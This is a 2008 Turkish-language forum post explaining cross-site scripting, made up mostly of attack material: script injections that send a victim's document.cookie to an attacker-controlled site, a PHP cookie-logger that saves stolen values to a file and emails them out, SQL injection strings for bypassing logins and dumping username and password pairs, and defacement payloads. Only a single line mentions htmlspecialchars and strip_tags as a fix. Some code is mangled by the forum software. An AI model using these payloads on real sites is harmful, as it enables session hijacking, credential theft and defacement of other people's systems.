GENÇLİK FORUM

GENÇLERİN BULUŞMA NOKTASI...
 
AnasayfaGaleriSSSAramaÜye ListesiKullanıcı GruplarıKayıt OlGiriş yap

Paylaş | 
 

 XSS Nedir?

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
admin serdar
Admin
Admin
avatar

Erkek
Mesaj Sayısı : 612
Yaş : 25
Nerden : TÜRKİYE/SAKARYA
Personalized field :
Kayıt tarihi : 25/06/08

MesajKonu: XSS Nedir?   Çarş. Haz. 25, 2008 9:26 pm

XSS nedir ?

xss sistemlerdeki script açıklarıdır...
ARama Modullerinde * Profil Panellerinde haber modullerinde shutbox vs.. bulunur..
bu modullere ufak scriptler ekleyerek sitenin yönlenmesini ya da hata vermesini sağlarız..

örn :

color=#0000ffhttp://localhost/hedefdeneme/index.php?content=<h1>SecurityatRawk****ldotcom

color=#0000ffhttp://localhost/asp-hedef/newcat.asp?tagx=<h1>SecurityatRawk****ldotcom

devam edelim...

Xss Hangi Sistemler Kullanılır..

Xss Genellikle Php-Nuke ya da Php ile yapılmış sistemlere kullanılır
ama Asp’de kullanılmaz anlamına gelmez. Asp İçin Daha Çok SQL İnjection Dediğimiz Tablo isimlerine
yapılam illegal girişimlerdir..

Biraz daha örnekleyerek Anlatalım..

Asp * Php farketmez :
">nedirbu<"font%20size=20>Hacked by ********%20:P</font>



basit bir arama scriptinde kullanılıcak açık..

Yukardaki Xss yi biraz daha açalım .(php)

( $_POST / $_SESSION * $_GET ) Php de arama yaparken verdiğimiz komut budur..

Session’da $username adlı bir değişken var diyelim.Sayfada echo’landığı $_SESSION[’variable’] şeklinde ekrana basılmadığı zaman url üzerinde sayfa.php?username=XSS girdiğimizde oturumdaki kullanıcıyı değil adres satırından gelen variable’ı ekrana basacaktır.

ama xss den verimli sonuç alabilmek için scrtiptin içinde java script çalıştırmak gerekir...

Güvenlik İçin :

strip_tags() ya da htmlspecialchars komutlarıyla bu açığı kapatabiliriz.


Java Scripti Neden Çalıştırırız :

Cookie Çalmak İçin ya da sayfayı yönlendirmek için ..
Örnekleyelim..

<script>document.location=’)</script>

Cookie Almak İçin :

<?php
$kayit = fopen("ekledik.txt"*"a");
foreach($_GET as $variable => $value) {
fwrite($kayit*$variable . ": " . $value . "\n");
}
fwrite($kayit*"---------------------------\n");
fclose($kayit);
mail("mailadresiniz@mail.com"*"Şifre Geldi çip çip "*""*’From: color=#0000ffTaze_Kek@geldi.com’);
?>

chmod ayarını 777 yapmak lazım yoksa gelen cookie kaydetmez

Örnek :

:2082/login?user=**<SCRIPT>location.href= ". cookie)</script>

/users.php?f=1&s=1’<script>document.location=’http: http://www.sizinsiteniz.com/xss/?’+escape(document·cookie)</script>&w=asc&d=50

comments.php?id=1"<script>document.location=’http: http://www.sizinsiteniz.com/xss/?’+escape(document·cookie)</script>

/modules.php?f=1&s=1’<XML src= "">
:2082/login?user=**<SCRIPT>location.href= ". cookie)</script>


gibi

Asp İçin Biraz Daha Farklıdır SQL İnjectionla HTML İnjecte edilir ya da Admin Olarak Girdi Yapılabilir...

sifredegistir.asp?sifrem=şifre&newpwd=şifreyeni&ui d=123323453’+or+uid+like’%admin%’;--%00

Haber_detay.asp?size=0’+union+select+’1’*’1 ’*’1’*concat(uname||’-’||passwd)+as+i_name+’1’+’1’+ from+usertable+where+uname+like+’25


<FORM METHOD=POST ACTION="" TARGET="so****rget" DEBUG=”666”>
<INPUT TYPE=HIDDEN NAME="Poll" VALUE="1">

şeklinde yapılacak Girdiler Anketlerde ya da Haber Yönetiminde Bir Girdi Kontrolu Yapılmıyosa Siteye Haber Elemeye Kadar gider...

kısaca XSS ya da Cros Site Script (CSS) Wep Programcısından Doğan Scirpt Açıklarıdır Diyebiliriz..

Bakınız :

LDU’nun Shubox Plugini Olan Sitelerde Html Tag’ları Çalıştırılıyordu Ve Sistem istediğimiz Bi Sayfaya Yönlendirilebiliyodu.

neocrome.net
Security advisory : Shoutbox plugin

bu açığı yaklaşık 2 hafta önce Memox İle Birlikte Güvenlik Testleri Yaparken Tarafımdan Bulunmuştu
Bunu Yanı Sıra Haber * Döküman ya da benzeri yazıların yazıldığı yerlerdede XSS vardı
neocrome ye mail attık bakalım bunun için bi eklenti çıkıcakmı

bu demek oluyoki yaptığımız Siteleri ya da scriptlerin güvenlik Önlemlerini iyi almak gerekir..
yoksa bir sahab uyandığınızda Hacked by Oturgaçlı Götüreç Yazısını Anasayfada Görmek İçten Bile değil

GuestBook * Ziyaretçi Defteri Ownz....

Bu tamamiyle XSS İçine Girmez türkiye ve diğer ülkerlde yaygın bi sistem
üyeler gelsin yazı yazsın diye yapmışlar
fakat mesaj yazılan Yerlerde html tagları ya da js (ja va script) kullanılabiliyor..

kodu

<**** http-equiv="Refresh" content="1;URL=http://www.xxx.com/">
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://genclik.0forum.biz,   www.aybisoft.com  bütün web siteler
 
XSS Nedir?
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Mut'un Tarihçesi...

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
GENÇLİK FORUM :: PC Hakkında Herşey :: PC Hakkında Herşey-
Buraya geçin: